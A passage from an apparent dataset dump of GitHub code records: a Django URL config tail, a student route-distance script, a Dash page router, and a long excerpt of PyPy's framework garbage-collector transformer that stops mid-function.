}),\n url(r'^accounts/', include('registration.urls')),\n url(\"\", include('django_socketio.urls')),\n)\n\nif settings.DEBUG:\n urlpatterns += staticfiles_urlpatterns()\n","repo_name":"OlgaKatzenelson/JhaneGlove","sub_path":"JhaneGlovePyCharm/JhaneGlovePyCharm/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2829470117","text":"\n\ndef info(file):\n    with open(file, 'r') as f:\n        c = f.readlines()\n    return c\n    \n\ndef get_country_list(arg):\n    d = {}\n    for el in arg:\n        if ':' in el:\n            k = el[:-1]\n            d[k] = []\n        else:\n            d[k].append(el[1:-1])\n    return d\n\ndef get_country_lenght(arg):\n    d = {}\n    for k,v in arg.items():\n        lenght = 0\n        ml = []\n        for el in v:\n            nl = []\n            if el == '':\n                continue\n            el = el.split('/')\n            el[0] = el[0].split('-')\n            lenght += int(el[1])\n            nl.append(el[0][0])\n            nl.append(el[0][1])\n            nl.append(el[1])\n            ml.append(nl)\n        ml.append(lenght)\n        d[k] = ml\n    return d \n\n\ndef get_ans(inp_1, inp_2, arg):\n    d = {}\n    for k,v in arg.items(): \n        if inp_1.lower() in k.lower() and inp_2.lower() in k.lower():\n            inp_ans = input('Where are you now: ')\n            for el in v:\n                if type(el) == str:\n                    if inp_ans.lower() == inp_1:\n                        traveled = int(v[-1])\n                        print(f'you have traveled {traveled} km')\n                    elif inp_ans.lower() == inp_2:\n                        traveled = 0\n                        print(f'you have traveled {traveled} km')\n                    elif inp_ans.lower() == el[0].lower():\n                        traveled = int(v[-1]) - int(el[-1])\n                        print(f'you have traveled {traveled} km')\n        return 
d\n\n\n# num = []\n# word = []\n# count = []\n# p = []\n# while True:\n# inp = input(\"Enter something \")\n# if inp == '0':\n# break\n# if inp.isdigit():\n# num.append(inp)\n# num.sort()\n \n # else:\n # word.append(inp)\n # word.sort() \n \n # if inp.isalpha() and len(inp) > 3:\n # count.append(inp) \n \n # if inp[:1] == inp[-1]:\n # p.append(inp)\n \ndef write_file(fname, ml): \n with open(fname, 'w') as f:\n f.write(str(ml)) \n f.close() \n return f\n \n \ndef main(): \n inp_1 = input('1: ')\n inp_2 = input('2: ')\n \n info_file = info('routes.txt')\n country_name = get_country_list(info_file)\n c_len = get_country_lenght(country_name)\n \n print(get_ans(inp_1, inp_2, c_len))\n \n # print(c_len)\n \n # write_file('num.txt', num)\n # write_file('word.txt', word)\n # write_file('count.txt', count)\n # write_file('p.txt', p)\n # print(info('num.txt'))\n # print(info('word.txt'))\n # print(info('count.txt'))\n # print(info('p.txt'))\nprint(main())","repo_name":"lilitstepanyan19/tasks_git","sub_path":"task_2/task_2.py","file_name":"task_2.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15367229165","text":"import dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\n\n# Connect to main app.py file\nfrom app import app\nfrom app import server\n\n# Connect to your app pages\nfrom apps import simple_examples, real_life\n# from apps import\n\napp.layout = html.Div([\n dcc.Location(id='url', refresh=False),\n html.Div([\n dcc.Link('Simple examples|', href='/apps/simple_examples'),\n dcc.Link('Real life', href='/apps/real_life'),\n ], className=\"row\"),\n html.Div(id='page-content', children=[])\n], style={\"background\": 'white'})\n\n\n@app.callback(Output('page-content', 'children'),\n [Input('url', 'pathname')])\ndef display_page(pathname):\n if pathname == '/apps/simple_examples':\n return simple_examples.layout\n if pathname == '/apps/real_life':\n return real_life.layout\n else:\n return simple_examples.layout\n\n\nif __name__ == '__main__':\n app.run_server(host=\"0.0.0.0\")\n","repo_name":"bohdanhlovatskyi/strYa","sub_path":"posture_app/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"34195010061","text":"from pypy.rpython.memory.gctransform.transform import GCTransformer\nfrom pypy.rpython.memory.gctransform.support import find_gc_ptrs_in_type, \\\n get_rtti, ll_call_destructor, type_contains_pyobjs, var_ispyobj\nfrom pypy.rpython.lltypesystem import lltype, llmemory, rffi, llgroup\nfrom pypy.rpython import rmodel\nfrom pypy.rpython.memory import gctypelayout\nfrom pypy.rpython.memory.gc import marksweep\nfrom pypy.rpython.memory.gcheader import GCHeaderBuilder\nfrom pypy.rlib.rarithmetic import ovfcheck\nfrom pypy.rlib import rgc\nfrom pypy.rlib.objectmodel import we_are_translated\nfrom pypy.translator.backendopt import graphanalyze\nfrom pypy.translator.backendopt.support import var_needsgc\nfrom pypy.translator.backendopt.finalizer import FinalizerAnalyzer\nfrom pypy.annotation import model as annmodel\nfrom pypy.rpython import annlowlevel\nfrom pypy.rpython.rbuiltin import gen_cast\nfrom pypy.rpython.memory.gctypelayout import ll_weakref_deref, WEAKREF\nfrom pypy.rpython.memory.gctypelayout import convert_weakref_to, WEAKREFPTR\nfrom pypy.rpython.memory.gctransform.log import log\nfrom 
pypy.tool.sourcetools import func_with_new_name\nfrom pypy.rpython.lltypesystem.lloperation import llop, LL_OPERATIONS\nimport sys, types\n\n\nTYPE_ID = llgroup.HALFWORD\n\nclass CollectAnalyzer(graphanalyze.BoolGraphAnalyzer):\n\n def analyze_direct_call(self, graph, seen=None):\n try:\n func = graph.func\n except AttributeError:\n pass\n else:\n if getattr(func, '_gctransformer_hint_cannot_collect_', False):\n return False\n if getattr(func, '_gctransformer_hint_close_stack_', False):\n return True\n return graphanalyze.GraphAnalyzer.analyze_direct_call(self, graph,\n seen)\n def analyze_external_call(self, op, seen=None):\n funcobj = op.args[0].value._obj\n if getattr(funcobj, 'random_effects_on_gcobjs', False):\n return True\n return graphanalyze.GraphAnalyzer.analyze_external_call(self, op,\n seen)\n def analyze_simple_operation(self, op, graphinfo):\n if op.opname in ('malloc', 'malloc_varsize'):\n flags = op.args[1].value\n return flags['flavor'] == 'gc'\n else:\n return (op.opname in LL_OPERATIONS and\n LL_OPERATIONS[op.opname].canmallocgc)\n\ndef find_initializing_stores(collect_analyzer, graph):\n from pypy.objspace.flow.model import mkentrymap\n entrymap = mkentrymap(graph)\n # a bit of a hackish analysis: if a block contains a malloc and check that\n # the result is not zero, then the block following the True link will\n # usually initialize the newly allocated object\n result = set()\n def find_in_block(block, mallocvars):\n for i, op in enumerate(block.operations):\n if op.opname in (\"cast_pointer\", \"same_as\"):\n if op.args[0] in mallocvars:\n mallocvars[op.result] = True\n elif op.opname in (\"setfield\", \"setarrayitem\", \"setinteriorfield\"):\n TYPE = op.args[-1].concretetype\n if (op.args[0] in mallocvars and\n isinstance(TYPE, lltype.Ptr) and\n TYPE.TO._gckind == \"gc\"):\n result.add(op)\n else:\n if collect_analyzer.analyze(op):\n return\n for exit in block.exits:\n if len(entrymap[exit.target]) != 1:\n continue\n newmallocvars = {}\n for i, var in enumerate(exit.args):\n if var in mallocvars:\n newmallocvars[exit.target.inputargs[i]] = True\n if newmallocvars:\n find_in_block(exit.target, newmallocvars)\n mallocnum = 0\n blockset = set(graph.iterblocks())\n while blockset:\n block = blockset.pop()\n if len(block.operations) < 2:\n continue\n mallocop = block.operations[-2]\n checkop = block.operations[-1]\n if not (mallocop.opname == \"malloc\" and\n checkop.opname == \"ptr_nonzero\" and\n mallocop.result is checkop.args[0] and\n block.exitswitch is checkop.result):\n continue\n rtti = get_rtti(mallocop.args[0].value)\n if rtti is not None and hasattr(rtti._obj, 'destructor_funcptr'):\n continue\n exits = [exit for exit in block.exits if exit.llexitcase]\n if len(exits) != 1:\n continue\n exit = exits[0]\n if len(entrymap[exit.target]) != 1:\n continue\n try:\n index = exit.args.index(mallocop.result)\n except ValueError:\n continue\n target = exit.target\n mallocvars = {target.inputargs[index]: True}\n mallocnum += 1\n find_in_block(target, mallocvars)\n #if result:\n # print \"found %s initializing stores in %s\" % (len(result), graph.name)\n return result\n\ndef find_clean_setarrayitems(collect_analyzer, graph):\n result = set()\n for block in graph.iterblocks():\n cache = set()\n for op in block.operations:\n if op.opname == 'getarrayitem':\n cache.add((op.args[0], op.result))\n elif op.opname == 'setarrayitem':\n if (op.args[0], op.args[2]) in cache:\n result.add(op)\n elif collect_analyzer.analyze(op):\n cache = set()\n return result\n\nclass 
FrameworkGCTransformer(GCTransformer):\n root_stack_depth = None # for tests to override\n\n def __init__(self, translator):\n from pypy.rpython.memory.gc.base import choose_gc_from_config\n from pypy.rpython.memory.gc.base import ARRAY_TYPEID_MAP\n from pypy.rpython.memory.gc import inspector\n\n super(FrameworkGCTransformer, self).__init__(translator, inline=True)\n if hasattr(self, 'GC_PARAMS'):\n # for tests: the GC choice can be specified as class attributes\n from pypy.rpython.memory.gc.marksweep import MarkSweepGC\n GCClass = getattr(self, 'GCClass', MarkSweepGC)\n GC_PARAMS = self.GC_PARAMS\n else:\n # for regular translation: pick the GC from the config\n GCClass, GC_PARAMS = choose_gc_from_config(translator.config)\n\n if hasattr(translator, '_jit2gc'):\n self.layoutbuilder = translator._jit2gc['layoutbuilder']\n else:\n self.layoutbuilder = TransformerLayoutBuilder(translator, GCClass)\n self.layoutbuilder.transformer = self\n self.get_type_id = self.layoutbuilder.get_type_id\n\n # set up GCData with the llgroup from the layoutbuilder, which\n # will grow as more TYPE_INFO members are added to it\n gcdata = gctypelayout.GCData(self.layoutbuilder.type_info_group)\n\n # initialize the following two fields with a random non-NULL address,\n # to make the annotator happy. The fields are patched in finish()\n # to point to a real array.\n foo = lltype.malloc(lltype.FixedSizeArray(llmemory.Address, 1),\n immortal=True, zero=True)\n a_random_address = llmemory.cast_ptr_to_adr(foo)\n gcdata.static_root_start = a_random_address # patched in finish()\n gcdata.static_root_nongcend = a_random_address # patched in finish()\n gcdata.static_root_end = a_random_address # patched in finish()\n gcdata.max_type_id = 13 # patched in finish()\n gcdata.typeids_z = a_random_address # patched in finish()\n self.gcdata = gcdata\n self.malloc_fnptr_cache = {}\n\n gcdata.gc = GCClass(translator.config.translation, **GC_PARAMS)\n root_walker = self.build_root_walker()\n self.root_walker = root_walker\n gcdata.set_query_functions(gcdata.gc)\n gcdata.gc.set_root_walker(root_walker)\n self.num_pushs = 0\n self.write_barrier_calls = 0\n self.write_barrier_from_array_calls = 0\n\n def frameworkgc_setup():\n # run-time initialization code\n root_walker.setup_root_walker()\n gcdata.gc.setup()\n gcdata.gc.post_setup()\n\n def frameworkgc__teardown():\n # run-time teardown code for tests!\n gcdata.gc._teardown()\n\n bk = self.translator.annotator.bookkeeper\n r_typeid16 = rffi.platform.numbertype_to_rclass[TYPE_ID]\n s_typeid16 = annmodel.SomeInteger(knowntype=r_typeid16)\n\n # the point of this little dance is to not annotate\n # self.gcdata.static_root_xyz as constants. 
XXX is it still needed??\n data_classdef = bk.getuniqueclassdef(gctypelayout.GCData)\n data_classdef.generalize_attr(\n 'static_root_start',\n annmodel.SomeAddress())\n data_classdef.generalize_attr(\n 'static_root_nongcend',\n annmodel.SomeAddress())\n data_classdef.generalize_attr(\n 'static_root_end',\n annmodel.SomeAddress())\n data_classdef.generalize_attr(\n 'max_type_id',\n annmodel.SomeInteger())\n data_classdef.generalize_attr(\n 'typeids_z',\n annmodel.SomeAddress())\n\n annhelper = annlowlevel.MixLevelHelperAnnotator(self.translator.rtyper)\n\n def getfn(ll_function, args_s, s_result, inline=False,\n minimal_transform=True):\n graph = annhelper.getgraph(ll_function, args_s, s_result)\n if minimal_transform:\n self.need_minimal_transform(graph)\n if inline:\n self.graphs_to_inline[graph] = True\n return annhelper.graph2const(graph)\n\n self.frameworkgc_setup_ptr = getfn(frameworkgc_setup, [],\n annmodel.s_None)\n # for tests\n self.frameworkgc__teardown_ptr = getfn(frameworkgc__teardown, [],\n annmodel.s_None)\n \n if root_walker.need_root_stack:\n self.incr_stack_ptr = getfn(root_walker.incr_stack,\n [annmodel.SomeInteger()],\n annmodel.SomeAddress(),\n inline = True)\n self.decr_stack_ptr = getfn(root_walker.decr_stack,\n [annmodel.SomeInteger()],\n annmodel.SomeAddress(),\n inline = True)\n else:\n self.incr_stack_ptr = None\n self.decr_stack_ptr = None\n self.weakref_deref_ptr = self.inittime_helper(\n ll_weakref_deref, [llmemory.WeakRefPtr], llmemory.Address)\n \n classdef = bk.getuniqueclassdef(GCClass)\n s_gc = annmodel.SomeInstance(classdef)\n s_gcref = annmodel.SomePtr(llmemory.GCREF)\n\n malloc_fixedsize_clear_meth = GCClass.malloc_fixedsize_clear.im_func\n self.malloc_fixedsize_clear_ptr = getfn(\n malloc_fixedsize_clear_meth,\n [s_gc, s_typeid16,\n annmodel.SomeInteger(nonneg=True),\n annmodel.SomeBool(),\n annmodel.SomeBool(),\n annmodel.SomeBool()], s_gcref,\n inline = False)\n if hasattr(GCClass, 'malloc_fixedsize'):\n malloc_fixedsize_meth = GCClass.malloc_fixedsize.im_func\n self.malloc_fixedsize_ptr = getfn(\n malloc_fixedsize_meth,\n [s_gc, s_typeid16,\n annmodel.SomeInteger(nonneg=True),\n annmodel.SomeBool(),\n annmodel.SomeBool(),\n annmodel.SomeBool()], s_gcref,\n inline = False)\n else:\n malloc_fixedsize_meth = None\n self.malloc_fixedsize_ptr = self.malloc_fixedsize_clear_ptr\n## self.malloc_varsize_ptr = getfn(\n## GCClass.malloc_varsize.im_func,\n## [s_gc] + [annmodel.SomeInteger(nonneg=True) for i in range(5)]\n## + [annmodel.SomeBool()], s_gcref)\n self.malloc_varsize_clear_ptr = getfn(\n GCClass.malloc_varsize_clear.im_func,\n [s_gc, s_typeid16]\n + [annmodel.SomeInteger(nonneg=True) for i in range(4)], s_gcref)\n self.collect_ptr = getfn(GCClass.collect.im_func,\n [s_gc, annmodel.SomeInteger()], annmodel.s_None)\n self.can_move_ptr = getfn(GCClass.can_move.im_func,\n [s_gc, annmodel.SomeAddress()],\n annmodel.SomeBool())\n\n if hasattr(GCClass, 'shrink_array'):\n self.shrink_array_ptr = getfn(\n GCClass.shrink_array.im_func,\n [s_gc, annmodel.SomeAddress(),\n annmodel.SomeInteger(nonneg=True)], annmodel.s_Bool)\n else:\n self.shrink_array_ptr = None\n\n if hasattr(GCClass, 'assume_young_pointers'):\n # xxx should really be a noop for gcs without generations\n self.assume_young_pointers_ptr = getfn(\n GCClass.assume_young_pointers.im_func,\n [s_gc, annmodel.SomeAddress()],\n annmodel.s_None)\n\n if hasattr(GCClass, 'heap_stats'):\n self.heap_stats_ptr = getfn(GCClass.heap_stats.im_func,\n [s_gc], annmodel.SomePtr(lltype.Ptr(ARRAY_TYPEID_MAP)),\n 
minimal_transform=False)\n self.get_member_index_ptr = getfn(\n GCClass.get_member_index.im_func,\n [s_gc, annmodel.SomeInteger(knowntype=llgroup.r_halfword)],\n annmodel.SomeInteger())\n\n if hasattr(GCClass, 'writebarrier_before_copy'):\n self.wb_before_copy_ptr = \\\n getfn(GCClass.writebarrier_before_copy.im_func,\n [s_gc] + [annmodel.SomeAddress()] * 2 +\n [annmodel.SomeInteger()] * 3, annmodel.SomeBool())\n elif GCClass.needs_write_barrier:\n raise NotImplementedError(\"GC needs write barrier, but does not provide writebarrier_before_copy functionality\")\n\n # in some GCs we can inline the common case of\n # malloc_fixedsize(typeid, size, False, False, False)\n if getattr(GCClass, 'inline_simple_malloc', False):\n # make a copy of this function so that it gets annotated\n # independently and the constants are folded inside\n if malloc_fixedsize_meth is None:\n malloc_fast_meth = malloc_fixedsize_clear_meth\n self.malloc_fast_is_clearing = True\n else:\n malloc_fast_meth = malloc_fixedsize_meth\n self.malloc_fast_is_clearing = False\n malloc_fast = func_with_new_name(\n malloc_fast_meth,\n \"malloc_fast\")\n s_False = annmodel.SomeBool(); s_False.const = False\n self.malloc_fast_ptr = getfn(\n malloc_fast,\n [s_gc, s_typeid16,\n annmodel.SomeInteger(nonneg=True),\n s_False, s_False, s_False], s_gcref,\n inline = True)\n else:\n self.malloc_fast_ptr = None\n\n # in some GCs we can also inline the common case of\n # malloc_varsize(typeid, length, (3 constant sizes), True, False)\n if getattr(GCClass, 'inline_simple_malloc_varsize', False):\n # make a copy of this function so that it gets annotated\n # independently and the constants are folded inside\n malloc_varsize_clear_fast = func_with_new_name(\n GCClass.malloc_varsize_clear.im_func,\n \"malloc_varsize_clear_fast\")\n s_False = annmodel.SomeBool(); s_False.const = False\n self.malloc_varsize_clear_fast_ptr = getfn(\n malloc_varsize_clear_fast,\n [s_gc, s_typeid16,\n annmodel.SomeInteger(nonneg=True),\n annmodel.SomeInteger(nonneg=True),\n annmodel.SomeInteger(nonneg=True),\n annmodel.SomeInteger(nonneg=True)], s_gcref,\n inline = True)\n else:\n self.malloc_varsize_clear_fast_ptr = None\n\n if getattr(GCClass, 'malloc_varsize_nonmovable', False):\n malloc_nonmovable = func_with_new_name(\n GCClass.malloc_varsize_nonmovable.im_func,\n \"malloc_varsize_nonmovable\")\n self.malloc_varsize_nonmovable_ptr = getfn(\n malloc_nonmovable,\n [s_gc, s_typeid16,\n annmodel.SomeInteger(nonneg=True)], s_gcref)\n else:\n self.malloc_varsize_nonmovable_ptr = None\n\n if getattr(GCClass, 'raw_malloc_memory_pressure', False):\n def raw_malloc_memory_pressure_varsize(length, itemsize):\n totalmem = length * itemsize\n if totalmem > 0:\n gcdata.gc.raw_malloc_memory_pressure(totalmem)\n #else: probably an overflow -- the following rawmalloc\n # will fail then\n def raw_malloc_memory_pressure(sizehint):\n gcdata.gc.raw_malloc_memory_pressure(sizehint)\n self.raw_malloc_memory_pressure_varsize_ptr = getfn(\n raw_malloc_memory_pressure_varsize,\n [annmodel.SomeInteger(), annmodel.SomeInteger()],\n annmodel.s_None, minimal_transform = False)\n self.raw_malloc_memory_pressure_ptr = getfn(\n raw_malloc_memory_pressure,\n [annmodel.SomeInteger()],\n annmodel.s_None, minimal_transform = False)\n\n\n self.identityhash_ptr = getfn(GCClass.identityhash.im_func,\n [s_gc, s_gcref],\n annmodel.SomeInteger(),\n minimal_transform=False)\n if getattr(GCClass, 'obtain_free_space', False):\n self.obtainfreespace_ptr = getfn(GCClass.obtain_free_space.im_func,\n [s_gc, 
annmodel.SomeInteger()],\n annmodel.SomeAddress())\n\n if GCClass.moving_gc:\n self.id_ptr = getfn(GCClass.id.im_func,\n [s_gc, s_gcref], annmodel.SomeInteger(),\n inline = False,\n minimal_transform = False)\n else:\n self.id_ptr = None\n\n self.get_rpy_roots_ptr = getfn(inspector.get_rpy_roots,\n [s_gc],\n rgc.s_list_of_gcrefs(),\n minimal_transform=False)\n self.get_rpy_referents_ptr = getfn(inspector.get_rpy_referents,\n [s_gc, s_gcref],\n rgc.s_list_of_gcrefs(),\n minimal_transform=False)\n self.get_rpy_memory_usage_ptr = getfn(inspector.get_rpy_memory_usage,\n [s_gc, s_gcref],\n annmodel.SomeInteger(),\n minimal_transform=False)\n self.get_rpy_type_index_ptr = getfn(inspector.get_rpy_type_index,\n [s_gc, s_gcref],\n annmodel.SomeInteger(),\n minimal_transform=False)\n self.is_rpy_instance_ptr = getfn(inspector.is_rpy_instance,\n [s_gc, s_gcref],\n annmodel.SomeBool(),\n minimal_transform=False)\n self.dump_rpy_heap_ptr = getfn(inspector.dump_rpy_heap,\n [s_gc, annmodel.SomeInteger()],\n annmodel.s_Bool,\n minimal_transform=False)\n self.get_typeids_z_ptr = getfn(inspector.get_typeids_z,\n [s_gc],\n annmodel.SomePtr(\n lltype.Ptr(rgc.ARRAY_OF_CHAR)),\n minimal_transform=False)\n\n self.set_max_heap_size_ptr = getfn(GCClass.set_max_heap_size.im_func,\n [s_gc,\n annmodel.SomeInteger(nonneg=True)],\n annmodel.s_None)\n\n self.write_barrier_ptr = None\n self.write_barrier_from_array_ptr = None\n if GCClass.needs_write_barrier:\n self.write_barrier_ptr = getfn(GCClass.write_barrier.im_func,\n [s_gc,\n annmodel.SomeAddress(),\n annmodel.SomeAddress()],\n annmodel.s_None,\n inline=True)\n func = getattr(gcdata.gc, 'jit_remember_young_pointer', None)\n if func is not None:\n # func should not be a bound method, but a real function\n assert isinstance(func, types.FunctionType)\n self.write_barrier_failing_case_ptr = getfn(func,\n [annmodel.SomeAddress()],\n annmodel.s_None)\n func = getattr(GCClass, 'write_barrier_from_array', None)\n if func is not None:\n self.write_barrier_from_array_ptr = getfn(func.im_func,\n [s_gc,\n annmodel.SomeAddress(),\n annmodel.SomeAddress(),\n annmodel.SomeInteger()],\n annmodel.s_None,\n inline=True)\n func = getattr(gcdata.gc,\n 'jit_remember_young_pointer_from_array',\n None)\n if func is not None:\n # func should not be a bound method, but a real function\n assert isinstance(func, types.FunctionType)\n self.write_barrier_from_array_failing_case_ptr = \\\n getfn(func,\n [annmodel.SomeAddress()],\n annmodel.s_None)\n self.statistics_ptr = getfn(GCClass.statistics.im_func,\n [s_gc, annmodel.SomeInteger()],\n annmodel.SomeInteger())\n\n # thread support\n if translator.config.translation.continuation:\n root_walker.need_stacklet_support(self, getfn)\n if translator.config.translation.thread:\n root_walker.need_thread_support(self, getfn)\n\n self.layoutbuilder.encode_type_shapes_now()\n\n annhelper.finish() # at this point, annotate all mix-level helpers\n annhelper.backend_optimize()\n\n self.collect_analyzer = CollectAnalyzer(self.translator)\n self.collect_analyzer.analyze_all()\n\n s_gc = self.translator.annotator.bookkeeper.valueoftype(GCClass)\n r_gc = self.translator.rtyper.getrepr(s_gc)\n self.c_const_gc = rmodel.inputconst(r_gc, self.gcdata.gc)\n s_gc_data = self.translator.annotator.bookkeeper.valueoftype(\n gctypelayout.GCData)\n r_gc_data = self.translator.rtyper.getrepr(s_gc_data)\n self.c_const_gcdata = rmodel.inputconst(r_gc_data, self.gcdata)\n self.malloc_zero_filled = GCClass.malloc_zero_filled\n\n HDR = self.HDR = 
self.gcdata.gc.gcheaderbuilder.HDR\n\n size_gc_header = self.gcdata.gc.gcheaderbuilder.size_gc_header\n vtableinfo = (HDR, size_gc_header, self.gcdata.gc.typeid_is_in_field)\n self.c_vtableinfo = rmodel.inputconst(lltype.Void, vtableinfo)\n tig = self.layoutbuilder.type_info_group._as_ptr()\n self.c_type_info_group = rmodel.inputconst(lltype.typeOf(tig), tig)\n sko = llmemory.sizeof(gcdata.TYPE_INFO)\n self.c_vtinfo_skip_offset = rmodel.inputconst(lltype.typeOf(sko), sko)\n\n def build_root_walker(self):\n from pypy.rpython.memory.gctransform import shadowstack\n return shadowstack.ShadowStackRootWalker(self)\n\n def consider_constant(self, TYPE, value):\n self.layoutbuilder.consider_constant(TYPE, value, self.gcdata.gc)\n\n #def get_type_id(self, TYPE):\n # this method is attached to the instance and redirects to\n # layoutbuilder.get_type_id().\n\n def special_funcptr_for_type(self, TYPE):\n return self.layoutbuilder.special_funcptr_for_type(TYPE)\n\n def gc_header_for(self, obj, needs_hash=False):\n hdr = self.gcdata.gc.gcheaderbuilder.header_of_object(obj)\n HDR = self.HDR\n withhash, flag = self.gcdata.gc.withhash_flag_is_in_field\n x = getattr(hdr, withhash)\n TYPE = lltype.typeOf(x)\n x = lltype.cast_primitive(lltype.Signed, x)\n if needs_hash:\n x |= flag # set the flag in the header\n else:\n x &= ~flag # clear the flag in the header\n x = lltype.cast_primitive(TYPE, x)\n setattr(hdr, withhash, x)\n return hdr\n\n def get_hash_offset(self, T):\n type_id = self.get_type_id(T)\n assert not self.gcdata.q_is_varsize(type_id)\n return self.gcdata.q_fixed_size(type_id)\n\n def finish_tables(self):\n group = self.layoutbuilder.close_table()\n log.info(\"assigned %s typeids\" % (len(group.members), ))\n log.info(\"added %s push/pop stack root instructions\" % (\n self.num_pushs, ))\n if self.write_barrier_ptr:\n log.info(\"inserted %s write barrier calls\" % (\n self.write_barrier_calls, ))\n if self.write_barrier_from_array_ptr:\n log.info(\"inserted %s write_barrier_from_array calls\" % (\n self.write_barrier_from_array_calls, ))\n\n # XXX because we call inputconst already in replace_malloc, we can't\n # modify the instance, we have to modify the 'rtyped instance'\n # instead. horrors. 
is there a better way?\n\n s_gcdata = self.translator.annotator.bookkeeper.immutablevalue(\n self.gcdata)\n r_gcdata = self.translator.rtyper.getrepr(s_gcdata)\n ll_instance = rmodel.inputconst(r_gcdata, self.gcdata).value\n\n addresses_of_static_ptrs = (\n self.layoutbuilder.addresses_of_static_ptrs_in_nongc +\n self.layoutbuilder.addresses_of_static_ptrs)\n log.info(\"found %s static roots\" % (len(addresses_of_static_ptrs), ))\n ll_static_roots_inside = lltype.malloc(lltype.Array(llmemory.Address),\n len(addresses_of_static_ptrs),\n immortal=True)\n\n for i in range(len(addresses_of_static_ptrs)):\n ll_static_roots_inside[i] = addresses_of_static_ptrs[i]\n ll_instance.inst_static_root_start = llmemory.cast_ptr_to_adr(ll_static_roots_inside) + llmemory.ArrayItemsOffset(lltype.Array(llmemory.Address))\n ll_instance.inst_static_root_nongcend = ll_instance.inst_static_root_start + llmemory.sizeof(llmemory.Address) * len(self.layoutbuilder.addresses_of_static_ptrs_in_nongc)\n ll_instance.inst_static_root_end = ll_instance.inst_static_root_start + llmemory.sizeof(llmemory.Address) * len(addresses_of_static_ptrs)\n newgcdependencies = []\n newgcdependencies.append(ll_static_roots_inside)\n ll_instance.inst_max_type_id = len(group.members)\n typeids_z = self.write_typeid_list()\n ll_typeids_z = lltype.malloc(rgc.ARRAY_OF_CHAR,\n len(typeids_z),\n immortal=True)\n for i in range(len(typeids_z)):\n ll_typeids_z[i] = typeids_z[i]\n ll_instance.inst_typeids_z = llmemory.cast_ptr_to_adr(ll_typeids_z)\n newgcdependencies.append(ll_typeids_z)\n return newgcdependencies\n\n def get_finish_tables(self):\n # We must first make sure that the type_info_group's members\n # are all followed. Do it repeatedly while new members show up.\n # Once it is really done, do finish_tables().\n seen = 0\n while seen < len(self.layoutbuilder.type_info_group.members):\n curtotal = len(self.layoutbuilder.type_info_group.members)\n yield self.layoutbuilder.type_info_group.members[seen:curtotal]\n seen = curtotal\n yield self.finish_tables()\n\n def write_typeid_list(self):\n \"\"\"write out the list of type ids together with some info\"\"\"\n from pypy.tool.udir import udir\n # XXX not ideal since it is not per compilation, but per run\n # XXX argh argh, this only gives the member index but not the\n # real typeid, which is a complete mess to obtain now...\n all_ids = self.layoutbuilder.id_of_type.items()\n all_ids = [(typeinfo.index, TYPE) for (TYPE, typeinfo) in all_ids]\n all_ids = dict(all_ids)\n f = udir.join(\"typeids.txt\").open(\"w\")\n for index in range(len(self.layoutbuilder.type_info_group.members)):\n f.write(\"member%-4d %s\\n\" % (index, all_ids.get(index, '?')))\n f.close()\n try:\n import zlib\n return zlib.compress(udir.join(\"typeids.txt\").read(), 9)\n except ImportError:\n return ''\n\n def transform_graph(self, graph):\n func = getattr(graph, 'func', None)\n if func and getattr(func, '_gc_no_collect_', False):\n if self.collect_analyzer.analyze_direct_call(graph):\n raise Exception(\"'no_collect' function can trigger collection:\"\n \" %s\" % func)\n \n if self.write_barrier_ptr:\n self.clean_sets = (\n find_initializing_stores(self.collect_analyzer, graph))\n if self.gcdata.gc.can_optimize_clean_setarrayitems():\n self.clean_sets = self.clean_sets.union(\n find_clean_setarrayitems(self.collect_analyzer, graph))\n super(FrameworkGCTransformer, self).transform_graph(graph)\n if self.write_barrier_ptr:\n self.clean_sets = None\n\n def gct_direct_call(self, hop):\n if 
self.collect_analyzer.analyze(hop.spaceop):\n livevars = self.push_roots(hop)\n self.default(hop)\n self.pop_roots(hop, livevars)\n else:\n self.default(hop)\n if hop.spaceop.opname == \"direct_call\":\n self.mark_call_cannotcollect(hop, hop.spaceop.args[0])\n\n def mark_call_cannotcollect(self, hop, name):\n pass\n\n gct_indirect_call = gct_direct_call\n\n def gct_fv_gc_malloc(self, hop, flags, TYPE, *args):\n op = hop.spaceop\n flavor = flags['flavor']\n\n PTRTYPE = op.result.concretetype\n assert PTRTYPE.TO == TYPE\n type_id = self.get_type_id(TYPE)\n\n c_type_id = rmodel.inputconst(TYPE_ID, type_id)\n info = self.layoutbuilder.get_info(type_id)\n c_size = rmodel.inputconst(lltype.Signed, info.fixedsize)\n kind_and_fptr = self.special_funcptr_for_type(TYPE)\n has_finalizer = (kind_and_fptr is not None and\n kind_and_fptr[0] == \"finalizer\")\n has_light_finalizer = (kind_and_fptr is not None and\n kind_and_fptr[0] == \"light_finalizer\")\n if has_light_finalizer:\n has_finalizer = True\n c_has_finalizer = rmodel.inputconst(lltype.Bool, has_finalizer)\n c_has_light_finalizer = rmodel.inputconst(lltype.Bool,\n has_light_finalizer)\n\n if not op.opname.endswith('_varsize') and not flags.get('varsize'):\n #malloc_ptr = self.malloc_fixedsize_ptr\n zero = flags.get('zero', False)\n if (self.malloc_fast_ptr is not None and\n not c_has_finalizer.value and\n (self.malloc_fast_is_clearing or not zero)):\n malloc_ptr = self.malloc_fast_ptr\n elif zero:\n malloc_ptr = self.malloc_fixedsize_clear_ptr\n else:\n malloc_ptr = self.malloc_fixedsize_ptr\n args = [self.c_const_gc, c_type_id, c_size,\n c_has_finalizer, c_has_light_finalizer,\n rmodel.inputconst(lltype.Bool, False)]\n else:\n assert not c_has_finalizer.value\n info_varsize = self.layoutbuilder.get_info_varsize(type_id)\n v_length = op.args[-1]\n c_ofstolength = rmodel.inputconst(lltype.Signed,\n info_varsize.ofstolength)\n c_varitemsize = rmodel.inputconst(lltype.Signed,\n info_varsize.varitemsize)\n if flags.get('nonmovable') and self.malloc_varsize_nonmovable_ptr:\n # we don't have tests for such cases, let's fail\n # explicitely\n malloc_ptr = self.malloc_varsize_nonmovable_ptr\n args = [self.c_const_gc, c_type_id, v_length]\n else:\n if self.malloc_varsize_clear_fast_ptr is not None:\n malloc_ptr = self.malloc_varsize_clear_fast_ptr\n else:\n malloc_ptr = self.malloc_varsize_clear_ptr\n args = [self.c_const_gc, c_type_id, v_length, 